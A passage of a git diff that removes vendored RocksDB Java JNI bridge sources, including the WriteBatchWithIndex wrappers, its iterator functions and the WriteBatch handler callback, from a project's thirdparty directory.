-        state.append(iter->value().ToString());
-        state.append(")");
-        count++;
-        break;
-      case rocksdb::kTypeMerge:
-        state.append("Merge(");
-        state.append(ikey.user_key.ToString());
-        state.append(", ");
-        state.append(iter->value().ToString());
-        state.append(")");
-        count++;
-        break;
-      case rocksdb::kTypeDeletion:
-        state.append("Delete(");
-        state.append(ikey.user_key.ToString());
-        state.append(")");
-        count++;
-        break;
-      default:
-        assert(false);
-        break;
-    }
-    state.append("@");
-    state.append(rocksdb::NumberToString(ikey.sequence));
-  }
-  if (!s.ok()) {
-    state.append(s.ToString());
-  } else if (count != rocksdb::WriteBatchInternal::Count(b)) {
-    state.append("CountMismatch()");
-  }
-  delete mem->Unref();
-
-  jbyteArray jstate = env->NewByteArray(static_cast<jsize>(state.size()));
-  if(jstate == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return nullptr;
-  }
-
-  env->SetByteArrayRegion(jstate, 0, static_cast<jsize>(state.size()),
-                          const_cast<jbyte*>(reinterpret_cast<const jbyte*>(state.c_str())));
-  if(env->ExceptionCheck()) {
-    // exception thrown: ArrayIndexOutOfBoundsException
-    env->DeleteLocalRef(jstate);
-    return nullptr;
-  }
-
-  return jstate;
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchTestInternalHelper
- * Method:    setSequence
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_WriteBatchTestInternalHelper_setSequence(
-    JNIEnv* env, jclass jclazz, jlong jwb_handle, jlong jsn) {
-  auto* wb = reinterpret_cast<rocksdb::WriteBatch*>(jwb_handle);
-  assert(wb != nullptr);
-
-  rocksdb::WriteBatchInternal::SetSequence(
-      wb, static_cast<rocksdb::SequenceNumber>(jsn));
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchTestInternalHelper
- * Method:    sequence
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_WriteBatchTestInternalHelper_sequence(
-    JNIEnv* env, jclass jclazz, jlong jwb_handle) {
-  auto* wb = reinterpret_cast<rocksdb::WriteBatch*>(jwb_handle);
-  assert(wb != nullptr);
-
-  return static_cast<jlong>(rocksdb::WriteBatchInternal::Sequence(wb));
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchTestInternalHelper
- * Method:    append
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_WriteBatchTestInternalHelper_append(
-    JNIEnv* env, jclass jclazz, jlong jwb_handle_1, jlong jwb_handle_2) {
-  auto* wb1 = reinterpret_cast<rocksdb::WriteBatch*>(jwb_handle_1);
-  assert(wb1 != nullptr);
-  auto* wb2 = reinterpret_cast<rocksdb::WriteBatch*>(jwb_handle_2);
-  assert(wb2 != nullptr);
-
-  rocksdb::WriteBatchInternal::Append(wb1, wb2);
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/write_batch_with_index.cc b/thirdparty/rocksdb/java/rocksjni/write_batch_with_index.cc
deleted file mode 100644
index 53f2a11..0000000
--- a/thirdparty/rocksdb/java/rocksjni/write_batch_with_index.cc
+++ /dev/null
@@ -1,582 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ and enables
-// calling c++ rocksdb::WriteBatchWithIndex methods from Java side.
-
-#include "include/org_rocksdb_WBWIRocksIterator.h"
-#include "include/org_rocksdb_WriteBatchWithIndex.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/utilities/write_batch_with_index.h"
-#include "rocksjni/portal.h"
-
-/*
- * Class:     org_rocksdb_WriteBatchWithIndex
- * Method:    newWriteBatchWithIndex
- * Signature: ()J
- */
-jlong Java_org_rocksdb_WriteBatchWithIndex_newWriteBatchWithIndex__(
-    JNIEnv* env, jclass jcls) {
-  auto* wbwi = new rocksdb::WriteBatchWithIndex();
-  return reinterpret_cast<jlong>(wbwi);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchWithIndex
- * Method:    newWriteBatchWithIndex
- * Signature: (Z)J
- */
-jlong Java_org_rocksdb_WriteBatchWithIndex_newWriteBatchWithIndex__Z(
-    JNIEnv* env, jclass jcls, jboolean joverwrite_key) {
-  auto* wbwi =
-      new rocksdb::WriteBatchWithIndex(rocksdb::BytewiseComparator(), 0,
-          static_cast<bool>(joverwrite_key));
-  return reinterpret_cast<jlong>(wbwi);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchWithIndex
- * Method:    newWriteBatchWithIndex
- * Signature: (JIZ)J
- */
-jlong Java_org_rocksdb_WriteBatchWithIndex_newWriteBatchWithIndex__JIZ(
-    JNIEnv* env, jclass jcls, jlong jfallback_index_comparator_handle,
-    jint jreserved_bytes, jboolean joverwrite_key) {
-  auto* wbwi =
-      new rocksdb::WriteBatchWithIndex(
-          reinterpret_cast<rocksdb::Comparator*>(jfallback_index_comparator_handle),
-          static_cast<size_t>(jreserved_bytes), static_cast<bool>(joverwrite_key));
-  return reinterpret_cast<jlong>(wbwi);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchWithIndex
- * Method:    count0
- * Signature: (J)I
- */
-jint Java_org_rocksdb_WriteBatchWithIndex_count0(
-    JNIEnv* env, jobject jobj, jlong jwbwi_handle) {
-  auto* wbwi = reinterpret_cast<rocksdb::WriteBatchWithIndex*>(jwbwi_handle);
-  assert(wbwi != nullptr);
-
-  return static_cast<jint>(wbwi->GetWriteBatch()->Count());
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchWithIndex
- * Method:    put
- * Signature: (J[BI[BI)V
- */
-void Java_org_rocksdb_WriteBatchWithIndex_put__J_3BI_3BI(
-    JNIEnv* env, jobject jobj, jlong jwbwi_handle, jbyteArray jkey,
-    jint jkey_len, jbyteArray jentry_value, jint jentry_value_len) {
-  auto* wbwi = reinterpret_cast<rocksdb::WriteBatchWithIndex*>(jwbwi_handle);
-  assert(wbwi != nullptr);
-  auto put = [&wbwi] (rocksdb::Slice key, rocksdb::Slice value) {
-    wbwi->Put(key, value);
-  };
-  rocksdb::JniUtil::kv_op(put, env, jobj, jkey, jkey_len, jentry_value,
-      jentry_value_len);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchWithIndex
- * Method:    put
- * Signature: (J[BI[BIJ)V
- */
-void Java_org_rocksdb_WriteBatchWithIndex_put__J_3BI_3BIJ(
-    JNIEnv* env, jobject jobj, jlong jwbwi_handle, jbyteArray jkey,
-    jint jkey_len, jbyteArray jentry_value, jint jentry_value_len,
-    jlong jcf_handle) {
-  auto* wbwi = reinterpret_cast<rocksdb::WriteBatchWithIndex*>(jwbwi_handle);
-  assert(wbwi != nullptr);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  assert(cf_handle != nullptr);
-  auto put = [&wbwi, &cf_handle] (rocksdb::Slice key, rocksdb::Slice value) {
-    wbwi->Put(cf_handle, key, value);
-  };
-  rocksdb::JniUtil::kv_op(put, env, jobj, jkey, jkey_len, jentry_value,
-      jentry_value_len);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchWithIndex
- * Method:    merge
- * Signature: (J[BI[BI)V
- */
-void Java_org_rocksdb_WriteBatchWithIndex_merge__J_3BI_3BI(
-    JNIEnv* env, jobject jobj, jlong jwbwi_handle, jbyteArray jkey,
-    jint jkey_len, jbyteArray jentry_value, jint jentry_value_len) {
-  auto* wbwi = reinterpret_cast<rocksdb::WriteBatchWithIndex*>(jwbwi_handle);
-  assert(wbwi != nullptr);
-  auto merge = [&wbwi] (rocksdb::Slice key, rocksdb::Slice value) {
-    wbwi->Merge(key, value);
-  };
-  rocksdb::JniUtil::kv_op(merge, env, jobj, jkey, jkey_len, jentry_value,
-      jentry_value_len);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchWithIndex
- * Method:    merge
- * Signature: (J[BI[BIJ)V
- */
-void Java_org_rocksdb_WriteBatchWithIndex_merge__J_3BI_3BIJ(
-    JNIEnv* env, jobject jobj, jlong jwbwi_handle, jbyteArray jkey,
-    jint jkey_len, jbyteArray jentry_value, jint jentry_value_len,
-    jlong jcf_handle) {
-  auto* wbwi = reinterpret_cast<rocksdb::WriteBatchWithIndex*>(jwbwi_handle);
-  assert(wbwi != nullptr);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  assert(cf_handle != nullptr);
-  auto merge = [&wbwi, &cf_handle] (rocksdb::Slice key, rocksdb::Slice value) {
-    wbwi->Merge(cf_handle, key, value);
-  };
-  rocksdb::JniUtil::kv_op(merge, env, jobj, jkey, jkey_len, jentry_value,
-      jentry_value_len);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchWithIndex
- * Method:    remove
- * Signature: (J[BI)V
- */
-void Java_org_rocksdb_WriteBatchWithIndex_remove__J_3BI(
-    JNIEnv* env, jobject jobj, jlong jwbwi_handle, jbyteArray jkey,
-    jint jkey_len) {
-  auto* wbwi = reinterpret_cast<rocksdb::WriteBatchWithIndex*>(jwbwi_handle);
-  assert(wbwi != nullptr);
-  auto remove = [&wbwi] (rocksdb::Slice key) {
-    wbwi->Delete(key);
-  };
-  rocksdb::JniUtil::k_op(remove, env, jobj, jkey, jkey_len);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchWithIndex
- * Method:    remove
- * Signature: (J[BIJ)V
- */
-void Java_org_rocksdb_WriteBatchWithIndex_remove__J_3BIJ(
-    JNIEnv* env, jobject jobj, jlong jwbwi_handle, jbyteArray jkey,
-    jint jkey_len, jlong jcf_handle) {
-  auto* wbwi = reinterpret_cast<rocksdb::WriteBatchWithIndex*>(jwbwi_handle);
-  assert(wbwi != nullptr);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  assert(cf_handle != nullptr);
-  auto remove = [&wbwi, &cf_handle] (rocksdb::Slice key) {
-    wbwi->Delete(cf_handle, key);
-  };
-  rocksdb::JniUtil::k_op(remove, env, jobj, jkey, jkey_len);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchWithIndex
- * Method:    deleteRange
- * Signature: (J[BI[BI)V
- */
-void Java_org_rocksdb_WriteBatchWithIndex_deleteRange__J_3BI_3BI(
-    JNIEnv* env, jobject jobj, jlong jwbwi_handle, jbyteArray jbegin_key,
-    jint jbegin_key_len, jbyteArray jend_key, jint jend_key_len) {
-  auto* wbwi = reinterpret_cast<rocksdb::WriteBatchWithIndex*>(jwbwi_handle);
-  assert(wbwi != nullptr);
-  auto deleteRange = [&wbwi](rocksdb::Slice beginKey, rocksdb::Slice endKey) {
-    wbwi->DeleteRange(beginKey, endKey);
-  };
-  rocksdb::JniUtil::kv_op(deleteRange, env, jobj, jbegin_key, jbegin_key_len,
-                          jend_key, jend_key_len);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchWithIndex
- * Method:    deleteRange
- * Signature: (J[BI[BIJ)V
- */
-void Java_org_rocksdb_WriteBatchWithIndex_deleteRange__J_3BI_3BIJ(
-    JNIEnv* env, jobject jobj, jlong jwbwi_handle, jbyteArray jbegin_key,
-    jint jbegin_key_len, jbyteArray jend_key, jint jend_key_len,
-    jlong jcf_handle) {
-  auto* wbwi = reinterpret_cast<rocksdb::WriteBatchWithIndex*>(jwbwi_handle);
-  assert(wbwi != nullptr);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  assert(cf_handle != nullptr);
-  auto deleteRange = [&wbwi, &cf_handle](rocksdb::Slice beginKey,
-                                         rocksdb::Slice endKey) {
-    wbwi->DeleteRange(cf_handle, beginKey, endKey);
-  };
-  rocksdb::JniUtil::kv_op(deleteRange, env, jobj, jbegin_key, jbegin_key_len,
-                          jend_key, jend_key_len);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchWithIndex
- * Method:    putLogData
- * Signature: (J[BI)V
- */
-void Java_org_rocksdb_WriteBatchWithIndex_putLogData(
-    JNIEnv* env, jobject jobj, jlong jwbwi_handle, jbyteArray jblob,
-    jint jblob_len) {
-  auto* wbwi = reinterpret_cast<rocksdb::WriteBatchWithIndex*>(jwbwi_handle);
-  assert(wbwi != nullptr);
-  auto putLogData = [&wbwi] (rocksdb::Slice blob) {
-    wbwi->PutLogData(blob);
-  };
-  rocksdb::JniUtil::k_op(putLogData, env, jobj, jblob, jblob_len);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchWithIndex
- * Method:    clear
- * Signature: (J)V
- */
-void Java_org_rocksdb_WriteBatchWithIndex_clear0(
-    JNIEnv* env, jobject jobj, jlong jwbwi_handle) {
-  auto* wbwi = reinterpret_cast<rocksdb::WriteBatchWithIndex*>(jwbwi_handle);
-  assert(wbwi != nullptr);
-
-  wbwi->Clear();
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchWithIndex
- * Method:    setSavePoint0
- * Signature: (J)V
- */
-void Java_org_rocksdb_WriteBatchWithIndex_setSavePoint0(
-    JNIEnv* env, jobject jobj, jlong jwbwi_handle) {
-  auto* wbwi = reinterpret_cast<rocksdb::WriteBatchWithIndex*>(jwbwi_handle);
-  assert(wbwi != nullptr);
-
-  wbwi->SetSavePoint();
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchWithIndex
- * Method:    rollbackToSavePoint0
- * Signature: (J)V
- */
-void Java_org_rocksdb_WriteBatchWithIndex_rollbackToSavePoint0(
-    JNIEnv* env, jobject jobj, jlong jwbwi_handle) {
-  auto* wbwi = reinterpret_cast<rocksdb::WriteBatchWithIndex*>(jwbwi_handle);
-  assert(wbwi != nullptr);
-
-  auto s = wbwi->RollbackToSavePoint();
-
-  if (s.ok()) {
-    return;
-  }
-
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchWithIndex
- * Method:    iterator0
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_WriteBatchWithIndex_iterator0(
-    JNIEnv* env, jobject jobj, jlong jwbwi_handle) {
-  auto* wbwi = reinterpret_cast<rocksdb::WriteBatchWithIndex*>(jwbwi_handle);
-  auto* wbwi_iterator = wbwi->NewIterator();
-  return reinterpret_cast<jlong>(wbwi_iterator);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchWithIndex
- * Method:    iterator1
- * Signature: (JJ)J
- */
-jlong Java_org_rocksdb_WriteBatchWithIndex_iterator1(
-    JNIEnv* env, jobject jobj, jlong jwbwi_handle, jlong jcf_handle) {
-  auto* wbwi = reinterpret_cast<rocksdb::WriteBatchWithIndex*>(jwbwi_handle);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  auto* wbwi_iterator = wbwi->NewIterator(cf_handle);
-  return reinterpret_cast<jlong>(wbwi_iterator);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchWithIndex
- * Method:    iteratorWithBase
- * Signature: (JJJ)J
- */
-jlong Java_org_rocksdb_WriteBatchWithIndex_iteratorWithBase(
-    JNIEnv* env, jobject jobj, jlong jwbwi_handle, jlong jcf_handle,
-    jlong jbi_handle) {
-  auto* wbwi = reinterpret_cast<rocksdb::WriteBatchWithIndex*>(jwbwi_handle);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  auto* base_iterator = reinterpret_cast<rocksdb::Iterator*>(jbi_handle);
-  auto* iterator = wbwi->NewIteratorWithBase(cf_handle, base_iterator);
-  return reinterpret_cast<jlong>(iterator);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchWithIndex
- * Method:    getFromBatch
- * Signature: (JJ[BI)[B
- */
-jbyteArray JNICALL Java_org_rocksdb_WriteBatchWithIndex_getFromBatch__JJ_3BI(
-    JNIEnv* env, jobject jobj, jlong jwbwi_handle, jlong jdbopt_handle,
-    jbyteArray jkey, jint jkey_len) {
-  auto* wbwi = reinterpret_cast<rocksdb::WriteBatchWithIndex*>(jwbwi_handle);
-  auto* dbopt = reinterpret_cast<rocksdb::DBOptions*>(jdbopt_handle);
-
-  auto getter = [&wbwi, &dbopt](const rocksdb::Slice& key, std::string* value) {
-    return wbwi->GetFromBatch(*dbopt, key, value);
-  };
-
-  return rocksdb::JniUtil::v_op(getter, env, jkey, jkey_len);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchWithIndex
- * Method:    getFromBatch
- * Signature: (JJ[BIJ)[B
- */
-jbyteArray Java_org_rocksdb_WriteBatchWithIndex_getFromBatch__JJ_3BIJ(
-    JNIEnv* env, jobject jobj, jlong jwbwi_handle, jlong jdbopt_handle,
-    jbyteArray jkey, jint jkey_len, jlong jcf_handle) {
-  auto* wbwi = reinterpret_cast<rocksdb::WriteBatchWithIndex*>(jwbwi_handle);
-  auto* dbopt = reinterpret_cast<rocksdb::DBOptions*>(jdbopt_handle);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-
-  auto getter =
-      [&wbwi, &cf_handle, &dbopt](const rocksdb::Slice& key,
-                                  std::string* value) {
-        return wbwi->GetFromBatch(cf_handle, *dbopt, key, value);
-      };
-
-  return rocksdb::JniUtil::v_op(getter, env, jkey, jkey_len);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchWithIndex
- * Method:    getFromBatchAndDB
- * Signature: (JJJ[BI)[B
- */
-jbyteArray Java_org_rocksdb_WriteBatchWithIndex_getFromBatchAndDB__JJJ_3BI(
-    JNIEnv* env, jobject jobj, jlong jwbwi_handle, jlong jdb_handle,
-    jlong jreadopt_handle, jbyteArray jkey, jint jkey_len) {
-  auto* wbwi = reinterpret_cast<rocksdb::WriteBatchWithIndex*>(jwbwi_handle);
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto* readopt = reinterpret_cast<rocksdb::ReadOptions*>(jreadopt_handle);
-
-  auto getter =
-      [&wbwi, &db, &readopt](const rocksdb::Slice& key, std::string* value) {
-        return wbwi->GetFromBatchAndDB(db, *readopt, key, value);
-      };
-
-  return rocksdb::JniUtil::v_op(getter, env, jkey, jkey_len);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchWithIndex
- * Method:    getFromBatchAndDB
- * Signature: (JJJ[BIJ)[B
- */
-jbyteArray Java_org_rocksdb_WriteBatchWithIndex_getFromBatchAndDB__JJJ_3BIJ(
-    JNIEnv* env, jobject jobj, jlong jwbwi_handle, jlong jdb_handle,
-    jlong jreadopt_handle, jbyteArray jkey, jint jkey_len, jlong jcf_handle) {
-  auto* wbwi = reinterpret_cast<rocksdb::WriteBatchWithIndex*>(jwbwi_handle);
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto* readopt = reinterpret_cast<rocksdb::ReadOptions*>(jreadopt_handle);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-
-  auto getter =
-      [&wbwi, &db, &cf_handle, &readopt](const rocksdb::Slice& key,
-                                         std::string* value) {
-        return wbwi->GetFromBatchAndDB(db, *readopt, cf_handle, key, value);
-      };
-
-  return rocksdb::JniUtil::v_op(getter, env, jkey, jkey_len);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchWithIndex
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_WriteBatchWithIndex_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  auto* wbwi = reinterpret_cast<rocksdb::WriteBatchWithIndex*>(handle);
-  assert(wbwi != nullptr);
-  delete wbwi;
-}
-
-/* WBWIRocksIterator below */
-
-/*
- * Class:     org_rocksdb_WBWIRocksIterator
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_WBWIRocksIterator_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  auto* it = reinterpret_cast<rocksdb::WBWIIterator*>(handle);
-  assert(it != nullptr);
-  delete it;
-}
-
-/*
- * Class:     org_rocksdb_WBWIRocksIterator
- * Method:    isValid0
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_WBWIRocksIterator_isValid0(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  return reinterpret_cast<rocksdb::WBWIIterator*>(handle)->Valid();
-}
-
-/*
- * Class:     org_rocksdb_WBWIRocksIterator
- * Method:    seekToFirst0
- * Signature: (J)V
- */
-void Java_org_rocksdb_WBWIRocksIterator_seekToFirst0(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  reinterpret_cast<rocksdb::WBWIIterator*>(handle)->SeekToFirst();
-}
-
-/*
- * Class:     org_rocksdb_WBWIRocksIterator
- * Method:    seekToLast0
- * Signature: (J)V
- */
-void Java_org_rocksdb_WBWIRocksIterator_seekToLast0(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  reinterpret_cast<rocksdb::WBWIIterator*>(handle)->SeekToLast();
-}
-
-/*
- * Class:     org_rocksdb_WBWIRocksIterator
- * Method:    next0
- * Signature: (J)V
- */
-void Java_org_rocksdb_WBWIRocksIterator_next0(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  reinterpret_cast<rocksdb::WBWIIterator*>(handle)->Next();
-}
-
-/*
- * Class:     org_rocksdb_WBWIRocksIterator
- * Method:    prev0
- * Signature: (J)V
- */
-void Java_org_rocksdb_WBWIRocksIterator_prev0(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  reinterpret_cast<rocksdb::WBWIIterator*>(handle)->Prev();
-}
-
-/*
- * Class:     org_rocksdb_WBWIRocksIterator
- * Method:    seek0
- * Signature: (J[BI)V
- */
-void Java_org_rocksdb_WBWIRocksIterator_seek0(
-    JNIEnv* env, jobject jobj, jlong handle, jbyteArray jtarget,
-    jint jtarget_len) {
-  auto* it = reinterpret_cast<rocksdb::WBWIIterator*>(handle);
-  jbyte* target = env->GetByteArrayElements(jtarget, nullptr);
-  if(target == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-
-  rocksdb::Slice target_slice(
-      reinterpret_cast<char*>(target), jtarget_len);
-
-  it->Seek(target_slice);
-
-  env->ReleaseByteArrayElements(jtarget, target, JNI_ABORT);
-}
-
-/*
- * Class:     org_rocksdb_WBWIRocksIterator
- * Method:    status0
- * Signature: (J)V
- */
-void Java_org_rocksdb_WBWIRocksIterator_status0(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  auto* it = reinterpret_cast<rocksdb::WBWIIterator*>(handle);
-  rocksdb::Status s = it->status();
-
-  if (s.ok()) {
-    return;
-  }
-
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-}
-
-/*
- * Class:     org_rocksdb_WBWIRocksIterator
- * Method:    entry1
- * Signature: (J)[J
- */
-jlongArray Java_org_rocksdb_WBWIRocksIterator_entry1(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  auto* it = reinterpret_cast<rocksdb::WBWIIterator*>(handle);
-  const rocksdb::WriteEntry& we = it->Entry();
-
-  jlong results[3];
-
-  //set the type of the write entry
-  switch (we.type) {
-    case rocksdb::kPutRecord:
-      results[0] = 0x1;
-      break;
-
-    case rocksdb::kMergeRecord:
-      results[0] = 0x2;
-      break;
-
-    case rocksdb::kDeleteRecord:
-      results[0] = 0x4;
-      break;
-
-    case rocksdb::kLogDataRecord:
-      results[0] = 0x8;
-      break;
-
-    default:
-      results[0] = 0x0;
-  }
-
-  // key_slice and value_slice will be freed by org.rocksdb.DirectSlice#close
-
-  auto* key_slice = new rocksdb::Slice(we.key.data(), we.key.size());
-  results[1] = reinterpret_cast<jlong>(key_slice);
-  if (we.type == rocksdb::kDeleteRecord
-      || we.type == rocksdb::kLogDataRecord) {
-    // set native handle of value slice to null if no value available
-    results[2] = 0;
-  } else {
-    auto* value_slice = new rocksdb::Slice(we.value.data(), we.value.size());
-    results[2] = reinterpret_cast<jlong>(value_slice);
-  }
-
-  jlongArray jresults = env->NewLongArray(3);
-  if(jresults == nullptr) {
-    // exception thrown: OutOfMemoryError
-    if(results[2] != 0) {
-      auto* value_slice = reinterpret_cast<rocksdb::Slice*>(results[2]);
-      delete value_slice;
-    }
-    delete key_slice;
-    return nullptr;
-  }
-
-  env->SetLongArrayRegion(jresults, 0, 3, results);
-  if(env->ExceptionCheck()) {
-    // exception thrown: ArrayIndexOutOfBoundsException
-    env->DeleteLocalRef(jresults);
-    if(results[2] != 0) {
-      auto* value_slice = reinterpret_cast<rocksdb::Slice*>(results[2]);
-      delete value_slice;
-    }
-    delete key_slice;
-    return nullptr;
-  }
-
-  return jresults;
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/writebatchhandlerjnicallback.cc b/thirdparty/rocksdb/java/rocksjni/writebatchhandlerjnicallback.cc
deleted file mode 100644
index 0f00766..0000000
--- a/thirdparty/rocksdb/java/rocksjni/writebatchhandlerjnicallback.cc
+++ /dev/null
@@ -1,306 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the callback "bridge" between Java and C++ for
-// rocksdb::Comparator.
-
-#include "rocksjni/writebatchhandlerjnicallback.h"
-#include "rocksjni/portal.h"
-
-namespace rocksdb {
-WriteBatchHandlerJniCallback::WriteBatchHandlerJniCallback(
-    JNIEnv* env, jobject jWriteBatchHandler)
-    : m_env(env) {
-
-  // Note: we want to access the Java WriteBatchHandler instance
-  // across multiple method calls, so we create a global ref
-  assert(jWriteBatchHandler != nullptr);
-  m_jWriteBatchHandler = env->NewGlobalRef(jWriteBatchHandler);
-  if(m_jWriteBatchHandler == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-
-  m_jPutMethodId = WriteBatchHandlerJni::getPutMethodId(env);
-  if(m_jPutMethodId == nullptr) {
-    // exception thrown
-    return;
-  }
-
-  m_jMergeMethodId = WriteBatchHandlerJni::getMergeMethodId(env);
-  if(m_jMergeMethodId == nullptr) {
-    // exception thrown
-    return;
-  }
-
-  m_jDeleteMethodId = WriteBatchHandlerJni::getDeleteMethodId(env);
-  if(m_jDeleteMethodId == nullptr) {
-    // exception thrown
-    return;
-  }
-
-  m_jDeleteRangeMethodId = WriteBatchHandlerJni::getDeleteRangeMethodId(env);
-  if (m_jDeleteRangeMethodId == nullptr) {
-    // exception thrown
-    return;
-  }
-
-  m_jLogDataMethodId = WriteBatchHandlerJni::getLogDataMethodId(env);
-  if(m_jLogDataMethodId == nullptr) {
-    // exception thrown
-    return;
-  }
-
-  m_jContinueMethodId = WriteBatchHandlerJni::getContinueMethodId(env);
-  if(m_jContinueMethodId == nullptr) {
-    // exception thrown
-    return;
-  }
-}
-
-void WriteBatchHandlerJniCallback::Put(const Slice& key, const Slice& value) {
-  const jbyteArray j_key = sliceToJArray(key);
-  if(j_key == nullptr) {
-    // exception thrown
-    if(m_env->ExceptionCheck()) {
-      m_env->ExceptionDescribe();
-    }
-    return;
-  }
-
-  const jbyteArray j_value = sliceToJArray(value);
-  if(j_value == nullptr) {
-    // exception thrown
-    if(m_env->ExceptionCheck()) {
-      m_env->ExceptionDescribe();
-    }
-    if(j_key != nullptr) {
-      m_env->DeleteLocalRef(j_key);
-    }
-    return;
-  }
-
-  m_env->CallVoidMethod(
-      m_jWriteBatchHandler,
-      m_jPutMethodId,
-      j_key,
-      j_value);
-  if(m_env->ExceptionCheck()) {
-    // exception thrown
-    m_env->ExceptionDescribe();
-    if(j_value != nullptr) {
-      m_env->DeleteLocalRef(j_value);
-    }
-    if(j_key != nullptr) {
-      m_env->DeleteLocalRef(j_key);
-    }
-    return;
-  }
-
-  if(j_value != nullptr) {
-    m_env->DeleteLocalRef(j_value);
-  }
-  if(j_key != nullptr) {
-    m_env->DeleteLocalRef(j_key);
-  }
-}
-
-void WriteBatchHandlerJniCallback::Merge(const Slice& key, const Slice& value) {
-  const jbyteArray j_key = sliceToJArray(key);
-  if(j_key == nullptr) {
-    // exception thrown
-    if(m_env->ExceptionCheck()) {
-      m_env->ExceptionDescribe();
-    }
-    return;
-  }
-
-  const jbyteArray j_value = sliceToJArray(value);
-  if(j_value == nullptr) {
-    // exception thrown
-    if(m_env->ExceptionCheck()) {
-      m_env->ExceptionDescribe();
-    }
-    if(j_key != nullptr) {
-      m_env->DeleteLocalRef(j_key);
-    }
-    return;
-  }
-
-  m_env->CallVoidMethod(
-      m_jWriteBatchHandler,
-      m_jMergeMethodId,
-      j_key,
-      j_value);
-  if(m_env->ExceptionCheck()) {
-    // exception thrown
-    m_env->ExceptionDescribe();
-    if(j_value != nullptr) {
-      m_env->DeleteLocalRef(j_value);
-    }
-    if(j_key != nullptr) {
-      m_env->DeleteLocalRef(j_key);
-    }
-    return;
-  }
-
-  if(j_value != nullptr) {
-    m_env->DeleteLocalRef(j_value);
-  }
-  if(j_key != nullptr) {
-    m_env->DeleteLocalRef(j_key);
-  }
-}
-
-void WriteBatchHandlerJniCallback::Delete(const Slice& key) {
-  const jbyteArray j_key = sliceToJArray(key);
-  if(j_key == nullptr) {
-    // exception thrown
-    if(m_env->ExceptionCheck()) {
-      m_env->ExceptionDescribe();
-    }
-    return;
-  }
-
-  m_env->CallVoidMethod(
-      m_jWriteBatchHandler,
-      m_jDeleteMethodId,
-      j_key);
-  if(m_env->ExceptionCheck()) {
-    // exception thrown
-    m_env->ExceptionDescribe();
-    if(j_key != nullptr) {
-      m_env->DeleteLocalRef(j_key);
-    }
-    return;
-  }
-
-  if(j_key != nullptr) {
-    m_env->DeleteLocalRef(j_key);
-  }
-}
-
-void WriteBatchHandlerJniCallback::DeleteRange(const Slice& beginKey,
-                                               const Slice& endKey) {
-  const jbyteArray j_beginKey = sliceToJArray(beginKey);
-  if (j_beginKey == nullptr) {
-    // exception thrown
